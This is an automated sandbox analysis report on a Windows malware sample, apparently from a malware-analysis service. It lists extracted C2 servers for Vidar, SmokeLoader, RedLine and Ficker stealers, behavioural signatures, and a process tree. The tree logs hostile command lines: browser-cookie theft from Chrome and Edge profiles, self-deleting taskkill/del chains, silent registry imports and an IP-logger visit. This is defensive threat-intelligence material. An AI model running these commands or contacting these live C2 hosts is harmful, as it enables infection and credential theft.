Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    101s
  • max time network
    321s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    20-07-2021 18:06

General

  • Target

    8 (11).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

2007

C2

37.1.219.52:6534

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

redline

Botnet

sel17

C2

dwarimlari.xyz:80

Extracted

Family

fickerstealer

C2

37.0.8.225:80

Extracted

Family

vidar

Version

39.7

Botnet

865

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    865

Signatures

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 10 IoCs

    RedlineStealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 42 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies registry class 16 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2852
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2740
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2724
        • C:\Users\Admin\AppData\Local\Temp\8 (11).exe
          "C:\Users\Admin\AppData\Local\Temp\8 (11).exe"
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:3184
          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2276
            • C:\Users\Admin\AppData\Local\Temp\7zS4E8E23B4\setup_install.exe
              "C:\Users\Admin\AppData\Local\Temp\7zS4E8E23B4\setup_install.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:4048
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c sonia_1.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4092
                • C:\Users\Admin\AppData\Local\Temp\7zS4E8E23B4\sonia_1.exe
                  sonia_1.exe
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2192
                  • C:\Users\Admin\AppData\Local\Temp\7zS4E8E23B4\sonia_1.exe
                    "C:\Users\Admin\AppData\Local\Temp\7zS4E8E23B4\sonia_1.exe" -a
                    6⤵
                    • Executes dropped EXE
                    PID:736
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c sonia_3.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:788
                • C:\Users\Admin\AppData\Local\Temp\7zS4E8E23B4\sonia_3.exe
                  sonia_3.exe
                  5⤵
                  • Executes dropped EXE
                  PID:3980
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS4E8E23B4\sonia_3.exe" & del C:\ProgramData\*.dll & exit
                    6⤵
                      PID:6756
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /im sonia_3.exe /f
                        7⤵
                        • Kills process with taskkill
                        PID:7084
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 6
                        7⤵
                        • Delays execution with timeout.exe
                        PID:5764
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sonia_4.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2272
                  • C:\Users\Admin\AppData\Local\Temp\7zS4E8E23B4\sonia_4.exe
                    sonia_4.exe
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3856
                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2276
                      • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:3912
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          8⤵
                          • Executes dropped EXE
                          PID:2868
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          8⤵
                            PID:4900
                        • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                          "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:4268
                          • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                            C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                            8⤵
                            • Executes dropped EXE
                            PID:3680
                        • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                          7⤵
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          PID:4380
                          • C:\Windows\winnetdriv.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626804786 0
                            8⤵
                            • Executes dropped EXE
                            PID:5044
                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:4800
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 680
                            8⤵
                            • Program crash
                            PID:5192
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 840
                            8⤵
                            • Program crash
                            PID:5840
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 856
                            8⤵
                            • Program crash
                            PID:5580
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 904
                            8⤵
                            • Program crash
                            PID:5112
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 968
                            8⤵
                            • Program crash
                            PID:1460
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 852
                            8⤵
                            • Program crash
                            PID:5868
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1064
                            8⤵
                            • Program crash
                            PID:6020
                        • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                          "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                          7⤵
                            PID:2016
                            • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                              "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                              8⤵
                                PID:4272
                            • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                              "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:2764
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -u -p 2764 -s 1008
                                8⤵
                                • Program crash
                                PID:5212
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c sonia_6.exe
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2092
                        • C:\Users\Admin\AppData\Local\Temp\7zS4E8E23B4\sonia_6.exe
                          sonia_6.exe
                          5⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of WriteProcessMemory
                          PID:2156
                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            6⤵
                            • Executes dropped EXE
                            PID:2140
                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            6⤵
                            • Executes dropped EXE
                            PID:2372
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c sonia_7.exe
                        4⤵
                          PID:3152
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_5.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1160
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_2.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:684
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                    1⤵
                      PID:2432
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                      1⤵
                        PID:2424
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                        1⤵
                          PID:1820
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s SENS
                          1⤵
                            PID:1404
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                            1⤵
                              PID:1224
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s Themes
                              1⤵
                                PID:1184
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                1⤵
                                  PID:1064
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                  1⤵
                                    PID:676
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                    1⤵
                                      PID:68
                                    • \??\c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                      1⤵
                                      • Suspicious use of SetThreadContext
                                      • Modifies data under HKEY_USERS
                                      • Modifies registry class
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:1012
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                        2⤵
                                        • Checks processor information in registry
                                        • Modifies data under HKEY_USERS
                                        • Modifies registry class
                                        PID:2456
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E8E23B4\sonia_2.exe
                                      sonia_2.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious behavior: MapViewOfSection
                                      PID:2232
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E8E23B4\sonia_5.exe
                                      sonia_5.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:2088
                                      • C:\Users\Admin\Documents\N2RLPffXyitqJO66QvHJw7hJ.exe
                                        "C:\Users\Admin\Documents\N2RLPffXyitqJO66QvHJw7hJ.exe"
                                        2⤵
                                          PID:4468
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /c taskkill /f /im chrome.exe
                                            3⤵
                                              PID:4532
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im chrome.exe
                                                4⤵
                                                • Kills process with taskkill
                                                PID:6332
                                          • C:\Users\Admin\Documents\nnyg6zKcuKlGxMilQZGKlc0L.exe
                                            "C:\Users\Admin\Documents\nnyg6zKcuKlGxMilQZGKlc0L.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:4456
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              3⤵
                                              • Executes dropped EXE
                                              PID:2016
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              3⤵
                                                PID:4520
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                3⤵
                                                  PID:5880
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  3⤵
                                                    PID:5192
                                                • C:\Users\Admin\Documents\bS2cVzTrjl6wTfMIaiu05isF.exe
                                                  "C:\Users\Admin\Documents\bS2cVzTrjl6wTfMIaiu05isF.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:4444
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                    3⤵
                                                      PID:3604
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd
                                                        4⤵
                                                          PID:4832
                                                          • C:\Windows\SysWOW64\findstr.exe
                                                            findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                            5⤵
                                                              PID:1460
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                              Acre.exe.com k
                                                              5⤵
                                                                PID:6064
                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                  6⤵
                                                                    PID:6264
                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                      7⤵
                                                                        PID:6456
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                          8⤵
                                                                            PID:6664
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                              9⤵
                                                                                PID:6976
                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                  10⤵
                                                                                    PID:4952
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                      11⤵
                                                                                        PID:6244
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                          12⤵
                                                                                            PID:5628
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                              13⤵
                                                                                                PID:4732
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                  14⤵
                                                                                                    PID:4472
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                      15⤵
                                                                                                        PID:5920
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                          16⤵
                                                                                                            PID:3160
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                              17⤵
                                                                                                                PID:4768
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                                  18⤵
                                                                                                                    PID:6504
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                                      19⤵
                                                                                                                        PID:4404
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                                          20⤵
                                                                                                                            PID:6156
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                                              21⤵
                                                                                                                                PID:4024
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                                                  22⤵
                                                                                                                                    PID:5920
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                                                      23⤵
                                                                                                                                        PID:6476
                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                    ping 127.0.0.1 -n 30
                                                                                                    5⤵
                                                                                                    • Runs ping.exe
                                                                                                    PID:6236
                                                                                            • C:\Users\Admin\Documents\0A9WwbM0r48jfD_1akMSlNQt.exe
                                                                                              "C:\Users\Admin\Documents\0A9WwbM0r48jfD_1akMSlNQt.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in Program Files directory
                                                                                              PID:4428
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                                                                                                3⤵
                                                                                                  PID:4680
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    explorer https://iplogger.org/2LBCU6
                                                                                                    4⤵
                                                                                                      PID:4260
                                                                                                    • C:\Windows\SysWOW64\regedit.exe
                                                                                                      regedit /s adj.reg
                                                                                                      4⤵
                                                                                                      • Runs .reg file with regedit
                                                                                                      PID:5272
                                                                                                    • C:\Windows\SysWOW64\regedit.exe
                                                                                                      regedit /s adj2.reg
                                                                                                      4⤵
                                                                                                      • Runs .reg file with regedit
                                                                                                      PID:5336
                                                                                                  • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                                                                                    "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4224
                                                                                                • C:\Users\Admin\Documents\WCu654jL0cHmhqzzVZ4WKK2f.exe
                                                                                                  "C:\Users\Admin\Documents\WCu654jL0cHmhqzzVZ4WKK2f.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:4420
                                                                                                  • C:\Users\Admin\Documents\WCu654jL0cHmhqzzVZ4WKK2f.exe
                                                                                                    "C:\Users\Admin\Documents\WCu654jL0cHmhqzzVZ4WKK2f.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4708
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 1148
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:2792
                                                                                                • C:\Users\Admin\Documents\Cbm0EscIzgHtDZfGt4cxeTAy.exe
                                                                                                  "C:\Users\Admin\Documents\Cbm0EscIzgHtDZfGt4cxeTAy.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:4408
                                                                                                  • C:\Users\Admin\Documents\Cbm0EscIzgHtDZfGt4cxeTAy.exe
                                                                                                    C:\Users\Admin\Documents\Cbm0EscIzgHtDZfGt4cxeTAy.exe
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2132
                                                                                                • C:\Users\Admin\Documents\UacDMLnXM8GSc3nv0JPI71SP.exe
                                                                                                  "C:\Users\Admin\Documents\UacDMLnXM8GSc3nv0JPI71SP.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4396
                                                                                                • C:\Users\Admin\Documents\4glVUy5cr09ECXVFczYCPVrG.exe
                                                                                                  "C:\Users\Admin\Documents\4glVUy5cr09ECXVFczYCPVrG.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:4524
                                                                                                  • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                    C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                    3⤵
                                                                                                      PID:6540
                                                                                                      • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                        "{path}"
                                                                                                        4⤵
                                                                                                          PID:4308
                                                                                                    • C:\Users\Admin\Documents\K0MmK3Ws08RcV3cTMjkMfxPH.exe
                                                                                                      "C:\Users\Admin\Documents\K0MmK3Ws08RcV3cTMjkMfxPH.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4888
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c cmd < Bagnava.xltm
                                                                                                        3⤵
                                                                                                          PID:3644
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4180
                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                              findstr /V /R "^IPAFDLOJiKVQTxFiLgMiLlaMrCAuVnAKdUxdXbtsjyJWSQEpztbDlGmbvNCwlINIlkmYZfphlcUGAvUjYsMQqXmJxXUpUru$" Sia.xltm
                                                                                                              5⤵
                                                                                                                PID:5364
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com
                                                                                                                Sensitive.exe.com p
                                                                                                                5⤵
                                                                                                                  PID:6216
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com p
                                                                                                                    6⤵
                                                                                                                      PID:6428
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com p
                                                                                                                        7⤵
                                                                                                                          PID:6636
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com p
                                                                                                                            8⤵
                                                                                                                              PID:6884
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com p
                                                                                                                                9⤵
                                                                                                                                  PID:7100
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com p
                                                                                                                                    10⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4468
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com p
                                                                                                                                      11⤵
                                                                                                                                        PID:3524
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com p
                                                                                                                                          12⤵
                                                                                                                                            PID:4056
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com p
                                                                                                                                              13⤵
